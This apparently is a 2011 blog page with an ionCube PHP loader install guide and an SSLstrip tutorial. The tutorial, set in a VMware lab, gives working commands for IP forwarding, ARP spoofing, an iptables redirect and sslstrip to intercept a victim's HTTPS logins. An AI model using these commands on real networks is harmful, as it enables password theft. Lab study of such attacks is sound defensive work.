Monday, January 17, 2011

Installation Guide : ionCube loader

A guide to installing and configuring the ionCube loader to view encoded web pages for scripts such as ClientExec.

What is ionCube?
ionCube produces leading tools for PHP source code protection to secure your PHP software from prying eyes and to combat software piracy. Featuring an advanced compiled-code encoding engine that translates source to highly efficient bytecodes, ionCube encoding tools deliver the ideal combination of maximum source code protection without sacrificing performance, reliability or language compatibility.

In order to view encoded ionCube files on your server you need the ionCube loader. This is a free plugin for Apache web server that only takes a few minutes to install and is well worth it.
http://www.ioncube.com/
Requirements:
- Root shell access to your server
- phpinfo page: create a new document and call it phpinfo.php. Inside place <?php phpinfo(); ?>
  Place this document in your www directory so you can view it and see all your PHP settings.
Installing ionCube Loader:
1. Download the program and store it on your server using wget or FTP.
http://www.ioncube.com/loader_download.php
2. Unpack the program
tar -zxvf ioncube_loaders.tar.gz
3. cd ioncube
4. Copy ioncube-install-assistant.php to a web directory such as your hosting directory and open it in your browser window.
cp ioncube-install-assistant.php /home/userdirectoryhere/www
Then open it: http://www.yourdomain.com/ioncube-install-assistant.php
The output should be something similar to:
Analysis of your system configuration shows:
PHP Version 4.3.3
Operating System Linux
Threaded PHP No
php.ini file /usr/local/lib/php.ini
Required Loader ioncube_loader_lin_4.3.so
5. Now let's move the ioncube directory to a permanent location:
cd ..
mv ioncube /usr/local

6. Now that you know the location of php.ini you need to edit it.
pico /usr/local/lib/php.ini
Now find where the other zend extensions are in the file.
ctrl + w: zend_extension
Paste in your new line for ioncube loader
zend_extension = /usr/local/ioncube/ioncube_loader_lin_4.3.so
7. Save the changes
ctrl + X then Y and enter
8. Restart the web server for the change to take effect.
/etc/init.d/httpd restart
Success! You should now see a section in your PHP Info page that says:
Additional Modules
Module Name ionCube Loader


Sunday, January 16, 2011

SSLstrip Tutorial


SSLstrip was released by Moxie to demonstrate the vulnerabilities he spoke about at Blackhat 2009. In this video we will look at how to get started with SSLstrip. We set up 2 VMware machines, one running Windows XP (victim) and the other BackTrack 3 (attacker). Before we actually begin hacking using SSLstrip, we need to set up the entire man-in-the-middle and packet redirection / forwarding mechanism. We do this by using the following commands in sequence:

1. Setting up IP Forwarding:

echo 1 > /proc/sys/net/ipv4/ip_forward

2. ARP MITM attack between Victim and Gateway:

arpspoof -i eth0 -t 192.168.1.6 192.168.1.1

3. Setting up port redirection using Iptables:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

4. Start the SSLstrip tool and make it listen to port 10000 (default anyways)

python sslstrip.py -w secret

Once this setup is up and running perfectly, all of our victim's traffic will be routed through us. In particular, HTTP traffic will be redirected to our port 10000, where SSLstrip is listening. After this we will be able to eavesdrop and steal all of the victim's passwords sent supposedly over "SSL".
Download SSLstrip Tool : Here - SSLstrip Tool